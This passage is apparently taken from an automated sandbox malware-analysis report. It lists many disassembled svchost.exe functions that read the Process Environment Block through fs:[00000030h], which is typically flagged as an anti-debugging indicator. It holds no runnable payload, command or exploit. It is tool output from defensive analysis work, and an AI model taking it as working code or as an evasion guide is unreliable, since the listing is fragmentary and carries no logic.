Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]	2_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]	2_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]	2_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]	2_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]	2_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]	2_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]	2_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]	2_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]	2_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]	2_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]	2_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]	2_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]	2_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]	2_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]	2_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]	2_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]	2_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]	2_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]	2_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]	2_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]	2_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]	2_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]	2_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]	2_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]	2_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]	2_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]	2_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]	2_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]	2_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]	2_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]	2_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]	2_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]	2_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]	2_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]	2_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]	2_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]	2_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]	2_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]	2_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]	2_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]	2_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]	2_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]	2_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]	2_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]	2_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]	2_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]	2_2_0347096E
